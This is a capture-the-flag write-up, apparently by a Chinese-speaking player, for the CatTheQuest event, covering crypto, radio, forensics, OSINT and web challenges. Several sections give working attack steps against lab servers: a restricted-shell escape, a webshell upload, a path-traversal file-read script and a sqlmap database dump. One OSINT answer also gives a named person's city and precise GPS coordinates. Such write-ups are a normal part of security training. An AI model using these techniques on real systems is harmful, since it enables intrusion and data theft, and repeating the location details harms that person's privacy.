CatTheQuest Writeup

👉👉👉获取高性价比云服务器👍👍👍

V@mos

You find a document belonging to someone called V@m0s_12 containing several sequences of characters, decrypt them : Uif mgc lv lr ymj ymjxzwjqi

提示 远在天边 近在眼前 flag 就是 题目中的 V@m0s_12

CAT{V@m0s_12}

Jakshu

During a radio communication interception, you understand: We all loved C at some point, right? The next day, you find a file on a suspicious server. Maybe it is the key to the hack?

查看文件类型 64位可执行文件

IDA pro x64 打开 分析伪代码

根据逻辑解题

import string

v8 = [46, 46, 58, 17, 88, 95, 86, 93, 90, 91, 92, 86, 94, 89, 80, 93, 94, 93, 11, 8, 12, 13, 11, 15, 80, 93, 86, 94, 15, 13, 8, 10, 11, 23]

xs = 'monji'
for n in range(len(v8)):
    for i in string.printable:
        x = ord(i)
        if x == (v8[n] ^ ord(xs[n % len(xs)])):
            print(i, end='')
#CAT{12930219039013aaabee9090edeee}

CAT{12930219039013aaabee9090edeee}

HAM

You have the callsign GB150GM. Your mission is to find the following information about the issuer of this callsign: First Name Last Name City GPS Coordinates

google 搜索 GB150GM 在 [qrz.com ][https://www.qrz.com/db/2E0LDW] 找到 一写相关信息

但是GPS不精确 继续搜索 在 qrzcq.com 找到 高精度 GPS

CAT{STEVEN_HOLLAND_REDRUTH_50.2291667-5.2083333}

VFM

Your second task is to find the transmission frequency and decode the signal to locate the transmission room and obtain the flag.

hint:

Here is some information about the “VFM” challenge since many are struggling with it and radio is not common. I’ll give you some additional information:
The .dat file opens with GNU Radio in a file source block.
This file contains the capture of an FM transmission that you need to decode.
Once decoded, you will get an audio file (use the wav file sink block).

下载 GUN Radio 绘制 流程

1. 文件源（File Source）
   • 添加 File Source 模块。
   • 设置 File 属性为你的 .dat 文件的路径。
   • 设置 Repeat 属性为 No（不重复）。
2. 正交解调（Quadrature Demod）
   • 添加一个 Quadrature Demod 模块
   • 设置 Gain 为 1。
3. 音频接收器（Audio Sink）（用于测试）
   • 添加一个 Audio Sink 来监听输出。
   • 确保你的系统音频设置能够处理输出。
4. WAV 文件接收器（WAV File Sink）
   • 为了将输出保存为 WAV 文件，添加一个 WAV File Sink。
   • 设置 Filename 为你希望的输出文件名。
   • 配置 Sample Rate（应与音频率匹配，通常为48 kHz）。

使用 openAI 音转文

from openai import OpenAI

client = OpenAI(api_key="sk-proj-***************")

audio_file = open("out.wav", "rb")
transcription = client.audio.transcriptions.create(
    model="whisper-1",
    file=audio_file,
)
print(transcription.text)
# Transmission room is upstairs. The flag is Romeo, Alpha, Delta, India, Oscar, Victor, Foxtrot, Mike, India, Sierra, Echo, Zulu.

根据 Transmission room is upstairs 提示 flag 为 每个单词首字母

CAT{RADIOVFMISEZ}

A Network Trace

Alors que vous recherchez un moyen d apprendre plus d information sur les pirates de ce monde, vous tombez sur une étrange capture. Celle-ci est étrangement mise en avant, comme s ils veulent nous montrer quelque chose.

解题:

使用 Wireshark 打开流量包 Ctrl+F查找关键字 CAT{ 在分组详情中发现FLAG

CAT{TeSt-Du-Syst3me-Gen3r@tif}

WarmUP

题目:

Salut, bienvenue. Ceci est un échauffement, amuse-toi bien. Vous avez intercepté une communication en entrant dans le monde virtuel. Un fichier a été téléchargé ; vous y trouverez peut-être une réponse.

解题:

010 Editor 查看文件二进制 发现应该是pyc文件

将后缀改为.pyc 在线解密

def dec(input):
    output = ''
    for i in range(len(input)):
        output += chr(ord(input[i]) - 2)
    return output


f = dec('j6emavj5arn5vj2t6a2ha5pet{rv32p')
print(f'''CAT{{{f}}}''')
#CAT{h4ck_th3_pl3th0r4_0f_3ncrypt10n}

CAT{h4ck_th3_pl3th0r4_0f_3ncrypt10n}

Secret Chest

Un coffre sécurisé contenant un précieux document est protégé par une requête spéciale. Votre mission est de déverrouiller ce coffre en envoyant une requête POST contenant un paramètre unique et secret. Le document est bien protégé et seul le mot peut le révéler.

the first part is an integer representhing the month wen spring starts in the northern bemisphere
the second part is the letter corresponding to the first vowel of the  alphabet
the third part is the English word for the palanet closest to Sun,reversed
the fourth part is  number equal to the product of the digits of the year of the first industrial revolution
the fifth part is the word "key" followed by the number of letters in the word.

assemble these fire parts to obtain the token

问 chatGPT 得到答案
To generate the token based on the instructions provided, let’s break down each part:

1. The first part is an integer representing the month when spring starts in the Northern Hemisphere. Spring typically begins in March, which is the third month. So, the first part is 3.
2. The second part is the letter corresponding to the first vowel of the alphabet, which is A.
3. The third part is the English word for the planet closest to the Sun, reversed. The closest planet to the Sun is Mercury, so reversed, it is yrucreM.
4. The fourth part is a number equal to the product of the digits of the year of the first Industrial Revolution. The Industrial Revolution started around 1760. Multiplying the digits: 1×7×6×0=01×7×6×0=0. So, the fourth part is 0.
5. The fifth part is the word “key” followed by the number of letters in the word “key”. “Key” has 3 letters, so this part becomes key3.

Now, assembling these five parts together, we get the token:

3AyrucreM0key3

发生POST请求得到flag

CAT{S3cr3t_Ch3st_B4D_S4f3tY}

0xym0r

Un post relayant l attaque contre CatTheFlag aurait été posté sur un réseau social par un dénommé 0xym0rH4z4RD, à vous de retrouver cette personne et ce qu il/elle cache

解题:

x.com 搜索 @0xym 出现次用户 在评论中有两段 二进制

拼接到一起 转码得到一个 url 链接

访问链接 查看源代码 出现flag

CAT{Welc0me_t0_CatTheQuest_h4z4rd}

Despawning

Your mission is to find the secret file in the server | user: userctf | password: userctf

ssh 登录 找flag文件

$ ls /
bin  boot  dev	etc  hide_flag.sh  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  shutdown.sh  srv  start.sh  sys  tmp  usr	var
$ cat /hide_flag.sh
#!/bin/sh

# Générer un chemin de répertoire aléatoire
DIR=$(mktemp -d /tmp/secret.XXXXXX)

# Générer un nom de fichier aléatoire qui contient "flag"
FILENAME=flag$(tr -dc A-Za-z0-9 </dev/urandom | head -c 8).txt

# Déplacer et renommer flag.txt vers ce répertoire et ce nom
mv /flag.txt $DIR/$FILENAME
chmod 755 $DIR
chmod 755 $DIR/$FILENAME
chown userctf:userctf $DIR
chown userctf:userctf $DIR/$FILENAME

# Garder le conteneur en cours d'exécution
tail -f /dev/null

$ ls /tmp
secret.FB3D1Y
$ cat /tmp/secret.FB3D1Y
cat: /tmp/secret.FB3D1Y: Is a directory
$ ls /tmp/secret.FB3D1Y
flagcrNpdWyt.txt
$ cat /tmp/secret.FB3D1Y/flagcrNpdWyt.txt
CAT{flag-2801-catthequest}$ 

CAT{flag-2801-catthequest}

Hidden

Your new mission is to find the secret file in this new server | user: userctf | password: userctf

开启环境登录 服务器 发现有命令限制

$ pwd
Commande non autorisée

$ ls
myshell.sh
$ cat myshell.sh
#!/bin/bash
while true; do read -p "$ " cmd; case $cmd in ls*|cat*|cd*) eval $cmd;; *) echo "Commande non autorisée";; esac; done

绕过限制 并使用bash 替换sh

$ ls | cp /usr/bin/bash ./
$ ls | rm myshell.sh
$ ls | mv bash myshell.sh

userctf@721f152db614:/$ cat hide_flag.sh 
#!/bin/sh

# Créer le répertoire de base s'il n'existe pas
mkdir -p /etc/.hidden

# Générer un chemin de répertoire aléatoire dans /etc/.hidden
DIR=$(mktemp -d /etc/.hidden/secret.XXXXXX)

# Générer un nom de fichier aléatoire qui contient "flag"
FILENAME=flag$(tr -dc A-Za-z0-9 </dev/urandom | head -c 8).txt

# Déplacer et renommer flag.txt vers ce répertoire et ce nom
mv /flag.txt $DIR/$FILENAME
chmod 755 $DIR
chmod 755 $DIR/$FILENAME
chown userctf:userctf $DIR
chown userctf:userctf $DIR/$FILENAME

# Garder le conteneur en cours d'exécution
tail -f /dev/null

发现影藏在 /etc/.hidden 下了 tab 补全路径 查看flag

userctf@721f152db614:/$ cat /etc/.hidden/secret.nCDwZ5/flagdR46nMoB.txt 
CAT{flag-catthequest-3981}

CAT{flag-catthequest-3981}

Deep Sound Deep Vision

Sounds can be seen and colors can be heard, as an old proverb goes. Deep sound, deep vision, it s 2.0, not just any vision. You hear a strange, somewhat goofy noise, reminiscent of a monster. This monster seems to swallow words, hiding precious secrets. An attentive ear and the right tools could reveal… the monsters. Can you hear the hidden truth? Can you see what lies behind the sound?

先使用 Audacity 查看频谱图 得到一些字符

CODE:

THE_MONSTER_IS

使用 DeepSound 打开 发现有隐藏 尝试 THE_MONSTER_IS 不对 发现和文件名 拼接 刚好是 THE_MONSTER_IS_YOU 密码正确

查看TXT 发现 有一些散乱的数字 前几个的ASCII 刚好是 CAT

提取 数字 解密 需要 把一处 9566 中间加空格

import re

with open(r"C:\Users\jack8\Desktop\MONSTERS.txt", 'r') as f:
    text = f.read()
pattern = r'\b\d{2,3}\b'
matches = re.findall(pattern, text)
print(matches)
for i in matches:
    print(chr(int(i)), end='')
#CAT{Look_Behind_You_HaHaHa}

CAT{Look_Behind_You_HaHaHa}

The history of the ruins

You are currently trying to disable the firewall when a website distracts your attention. Maybe this one will help us accomplish our mission. To do this, you need to read the flag.txt file in the root folder.

访问网页

查看源代码 发现 control-firewall.php

访问 control-firewall.php 查看源代码 发现 firewall-login.php ; doc.php 和 catfile.php

<h1>Bienvenu sur le système de controle du pare feu</h1>
<link rel="stylesheet" href="style.css">
<a href="firewall-login.php">Login</a>
<a href="doc.php">Documentation</a>

<!-- Attention le mode developpeur est activé, cela vous permet d'accéder a la fonction catfile.php --><!-- Please note that developer mode is enabled, allowing you to access the catfile.php function. -->

catfile.php 可以读取文件 但是不能访问root文件

查看 doc.php 源码

查看 firewall-login.php 源码 发现 SuperSecretAdminPage.php

查看 SuperSecretAdminPage.php 源码 发现 可以post写入文件

写入 一句话木马

AntSword 连接 登录shell 搜索 suid 命令 发现 特殊命令 bettercat (前面眼瞎没看到,尝试提权搞了一天都没成)

使用 bettercat 查看 /root/flag 得到flag

CAT{F1reW@11-1s-NOw-DIs@ble-rU1ns}

Ave Caesar

You are a Roman general and Caesar is getting in touch with you. You fell asleep during the training, and the only thing you remember is that only part of each message is important. To ensure the authenticity of the sender, Caesar usually sends several fake messages before the real one. You must be able to respond to him. You also remember that the first of the two messages provides useful information for the rest of the conversation. Would you be able to decipher the second message sent by Caesar ?

nc 连接 给出一段密文 根据题目使用 Caesar 解密 我这里用的rot13 在23栏 出现明文

使用python 实现快速提交 解密结果

import socket


def rot13_encrypt(plaintext: str, key) -> str:
    ciphertext = ""
    for c in plaintext:
        if c.isalpha():
            if c.isupper():
                new_ascii = (ord(c) - 65 + key) % 26 + 65
            else:
                new_ascii = (ord(c) - 97 + key) % 26 + 97
            ciphertext += chr(new_ascii)
        else:
            ciphertext += c
    return ciphertext


sock = socket.socket()
sock.connect(("142.93.166.196", 31125))

data = sock.recv(1024).decode('utf-8')
print(data)
r = rot13_encrypt(data.strip(), 23)
print(r)
sock.send((r + "\n").encode('utf-8'))
for i in range(25):
    data = sock.recv(1024).decode('utf-8')
    print(data)
    mm = rot13_encrypt(data.strip(), 23)
    sock.send((mm.split('|')[1] + "\n").encode('utf-8'))

sock.close()

多次提交后 出现一段特殊 的密文

rot13 - 23 解密得到flag

CTF{Y0u_B3@t_Th3_Gr3@t_C3s@r}

Web File Viewer

Exploiting an LFI vulnerability, find the flag.txt file located in the secret directory.

可以读取base64编码的路径 文件 查看index.php 成功显示

<p>Requested file (base64): ZmlsZXMvLi4vaW5kZXgucGhw</p><p>Decoded file path: files/../index.php</p><p>Constructed file path: /var/www/html/files/../index.php</p><h1>Contents of /var/www/html/files/../index.php</h1><pre><?php
if (isset($_GET['file'])) {
    $file = $_GET['file'];

    // Decode the base64 encoded file path
    $decoded_file = base64_decode($file);

    // Construct the full file path
    $file_path = __DIR__ . '/' . $decoded_file;

    // Debugging output (vous pouvez supprimer ces lignes si nécessaire)
    echo "<p>Requested file (base64): $file</p>";
    echo "<p>Decoded file path: $decoded_file</p>";
    echo "<p>Constructed file path: $file_path</p>";

    // Ensure the file exists
    if (file_exists($file_path)) {
        echo "<h1>Contents of $file_path</h1>";
        echo "<pre>" . file_get_contents($file_path) . "</pre>";
    } else {
        echo "Invalid file!";
    }
} else {
    echo "No file specified!";
}
?>
</pre>

根据题目提示 flag.txt 在 secret 目录下

import base64

import requests

# t = '../index.php'
t = '../secret/flag.txt'
a = f'files/{t}'
b = base64.b64encode(a.encode()).decode()

r = requests.get(f'http://165.227.157.253:8888/index.php?file={b}')
print(r.text)

获得flag

<p>Requested file (base64): ZmlsZXMvLi4vc2VjcmV0L2ZsYWcudHh0</p><p>Decoded file path: files/../secret/flag.txt</p><p>Constructed file path: /var/www/html/files/../secret/flag.txt</p><h1>Contents of /var/www/html/files/../secret/flag.txt</h1><pre>CAT{LFI_vulnerability_found}
</pre>

CAT{LFI_vulnerability_found}

Good links or get troll

Have you ever heard of F.ff or Kernet, something like that? This challenge takes you on a decoding journey where an image and a strangely strange text file contain essential clues. It s a story of lost segments and the right insertion key. It s up to you to solve the mystery!

gAAAAABmlqHPafjey1wIsO6YbomfJA_CNUvOMiiAvvTL72zTMzPgbx17d8YagcRygxuuLhrm_YO7w3vFjuBu85lJ66dTn1laJA==
gAAAAABmlp4rqEm9Bln-Hg6g0H9ub4tN-_UXfMwVMo9UvlKRo-C4KY0OLqMfyquAQEnxMqXN6p-3_-OpgEUbXZfCWpaxhWpm_Q==
idk i forgot the order 
gAAAAABmlqHPbeLA0OHLRKeJe61NXxjDBLwL86QOeYxtnfxif2KX_9f4e_KP9md_jn6_VRArfPSb2XdTbndZeXcGNfU7GHnB2Q==
gAAAAABmlp4rdZr3tkygP5_qpDsUaAAdl9imLbv0amsp-ISsMshj7xN57ZHZR90HaWcsFt9iqreqSQ_x6d2z9qlzIKSBmkNJZg==
!D
gAAAAABmlqHPWOCafiCEpAxLTxankaRsdKHy4TU0rKrU5l1qdb8WRslAOpxae5enR8MzfmLcVYdiT6HovrmWFcHS6HlJtqqYvcQikjtGPU-TsWQXSvWW23A=
gAAAAABmlp4r9SKcsfl3uqnCO3yR_a0wrSkdftSAZPYf_HLXr_3Bk6DMVaDDY5pd8FSt3xeiUiobdHRUuMoZ3Z63kJXxoo4SEQ==
:D
gAAAAABmlqHPHS3jOPomOeP12CzJS-VTocX4h5wvWD0fxLERjXgI2mfFLzyPkE5Y7-4rMJGItSUmMMHE6CdbZ4XlcFU48kYdsg==
gAAAAABmlqHPafjey1wIsO6YbomfJA_CNUvOMiiAvvTL72zTMzPgbx17d8YagcRygxuuLhrm_YO7w3vFjuBu85lJ66dTn1laJA==

根据题目内容 判断 是 Fernet 加密

使用 StegSolve-1.4.jar 打开图片 发现存在 MSB 隐写 应该是秘钥

将二进制数据解码

得到 base64 字符串 发现符合 Fernet 秘钥特征 使用python 解密数据

from cryptography.fernet import Fernet

key = b'OVbDMRqynkvjG6Eek2wTXx6lWN1p6ZrH6dvnEsg0uxw='
fernet = Fernet(key)
a = [
    b'gAAAAABmlqHPafjey1wIsO6YbomfJA_CNUvOMiiAvvTL72zTMzPgbx17d8YagcRygxuuLhrm_YO7w3vFjuBu85lJ66dTn1laJA==',
    b'gAAAAABmlp4rqEm9Bln-Hg6g0H9ub4tN-_UXfMwVMo9UvlKRo-C4KY0OLqMfyquAQEnxMqXN6p-3_-OpgEUbXZfCWpaxhWpm_Q==',
    b'gAAAAABmlqHPbeLA0OHLRKeJe61NXxjDBLwL86QOeYxtnfxif2KX_9f4e_KP9md_jn6_VRArfPSb2XdTbndZeXcGNfU7GHnB2Q==',
    b'gAAAAABmlp4rdZr3tkygP5_qpDsUaAAdl9imLbv0amsp-ISsMshj7xN57ZHZR90HaWcsFt9iqreqSQ_x6d2z9qlzIKSBmkNJZg==',
    b'gAAAAABmlqHPWOCafiCEpAxLTxankaRsdKHy4TU0rKrU5l1qdb8WRslAOpxae5enR8MzfmLcVYdiT6HovrmWFcHS6HlJtqqYvcQikjtGPU-TsWQXSvWW23A=',
    b'gAAAAABmlp4r9SKcsfl3uqnCO3yR_a0wrSkdftSAZPYf_HLXr_3Bk6DMVaDDY5pd8FSt3xeiUiobdHRUuMoZ3Z63kJXxoo4SEQ==',
    b'gAAAAABmlqHPHS3jOPomOeP12CzJS-VTocX4h5wvWD0fxLERjXgI2mfFLzyPkE5Y7-4rMJGItSUmMMHE6CdbZ4XlcFU48kYdsg==',
    b'gAAAAABmlqHPafjey1wIsO6YbomfJA_CNUvOMiiAvvTL72zTMzPgbx17d8YagcRygxuuLhrm_YO7w3vFjuBu85lJ66dTn1laJA==',
]

for i in a:
    print(fernet.decrypt(i))
    
# b'hahah loser L'
# b'CAT{https:'
# b'No no NO no'
# b'//ctftime.org'
# b'Just kidding sorry'
# b'/event/2414/'
# b'Nice try lmao'
# b'hahah loser L'

根据flag 规则 组合关键字符串 得到flag

CAT{https://ctftime.org/event/2414/}

W3BBY

I found a website, you have to find the flag now.

修改 请求参数 python debug 报错 发现 register.html

注册以后 登录 发现 /search_messages?query=123 可能存在sql 注入 (其他接口都可以通过报错判断无法注入)

发送给CO2插件进行sqlmap 测试 dump 出 flag

CAT{sql_exploitation}

[2-2]Affiche Cybernétique

Decipher the hidden message on the poster to obtain the access code for the machine. This code is necessary to uncover the secrets of the pirates and move on to the next challenge.

zsteg 隐写

CAT{Q.rar-key->FTPF18/08/1944}

[2-3]Mise en Abymes

Unzip the zip file and explore the numerous text files. Use the clues gathered so far to identify the five files containing fragments of the flag. Assemble them in the correct order to reveal the complete flag.

分析文件 发现 最新修改时间的五个文件夹中的最新的第一个文件 中包含 flag 段

编写脚本 提取关键文本 文件名开头为 bil 的 安装文件名最后的字母排序 并读取 获取flag

import os

files = []
for dirpath, dirnames, filenames in os.walk(r'D:\Users\jack\Downloads\Abymes\Q'):
    for filename in filenames:
        if filename.startswith('bil'):
            files.append(os.path.join(dirpath, filename))

sorted_files = sorted(files, key=lambda x: x[-5])
for file in sorted_files:
    with open(file, 'r') as f:
        print(f.read().split('\n')[0].replace('#', ''), end='')

CAT{473KHZXVII->170503AJlegends}

[2-4]Door and machines

By entering the previously found code, you trigger a hidden mechanism. The ground shakes, and a large stone covered in vegetation moves, revealing a secret door. Behind this door lies the true secret base of the pirates.

dcode.fr-在线解密

Q0FUe3pvbWJ5el9hcmVfYXJpdGhtZXRpY3M= | base_64 | CAT{zombyz_are_arithmetics
fi3sh4mpctoi6am1cixsc4m1qp48g | Z-Base-32 | -snimda_are_firsts
2d6f74686572735f6172655f686578617d | hex | -others_are_hexa}

CAT{zombyz_are_arithmetics-snimda_are_firsts-others_are_hexa}

[2-5]Find da target

After identifying the zombie and admin machines, you now have access to the main console of the pirate base. You discover that they are using a control tower to coordinate their attacks. To neutralize this threat, you must find the IP address of the main PC to target.

chatGPT:

以下是每个数据包的源IP地址和目的IP地址：

1. Frame 1: Src: 192.168.0.2, Dst: 192.168.1.1
2. Frame 2: Src: 192.168.0.3, Dst: 192.168.1.1
3. Frame 3: Src: 192.166.47.3, Dst: 192.168.1.1
4. Frame 4: Src: 192.168.1.2, Dst: 192.168.1.1
5. Frame 5: Src: 192.168.0.4, Dst: 192.168.1.1
6. Frame 6: Src: 192.168.1.3, Dst: 192.168.1.1
7. Frame 7: Src: 192.166.47.3, Dst: 192.168.1.1
8. Frame 8: Src: 192.168.0.5, Dst: 192.168.1.1
9. Frame 9: Src: 192.166.47.3, Dst: 192.168.1.1

通过对比这些IP地址，我们可以发现IP地址 192.166.47.3 出现在 Frame 3, Frame 7 和 Frame 9 中，这个IP地址与其他IP地址（192.168.0.x 和 192.168.1.x）不在同一个子网中。因此，192.166.47.3 是一个异常的IP地址。

CAT{192.166.47.3}

[2-6]Research and Destroy

Use the retrieved information to write a command that simulates an attack by redirecting the traffic from the zombie machines to the target machine. You will not actually execute this command, but you must demonstrate a full understanding of what such an attack would involve.

zombys = [
    'c0a8010a',
    'c0a8020c',
    'c0a8030e',
    'c0a80410',
    'c0a80512',
    'c0a80614',
    'c0a80716',
    'c0a80818',
    'c0a8091a',
    'c0a80a1c'
]

for i in zombys:
    print(hex_to_ip(i), end='-')

print()
target = 'c0a62f03'
print(hex_to_ip(target))

'''
192.168.1.10-192.168.2.12-192.168.3.14-192.168.4.16-192.168.5.18-192.168.6.20-192.168.7.22-192.168.8.24-192.168.9.26-192.168.10.28-
192.166.47.3
ip zombys(separate '-') :
192.168.1.10-192.168.2.12-192.168.3.14-192.168.4.16-192.168.5.18-192.168.6.20-192.168.7.22-192.168.8.24-192.168.9.26-192.168.10.28
target:
192.166.47.3
Correct
Flag: CAT{3232235786323223604432322363023232236560323223681832322370763232237334323223759232322378503232238108000011} 
'''

CAT{3232235786323223604432322363023232236560323223681832322370763232237334323223759232322378503232238108000011}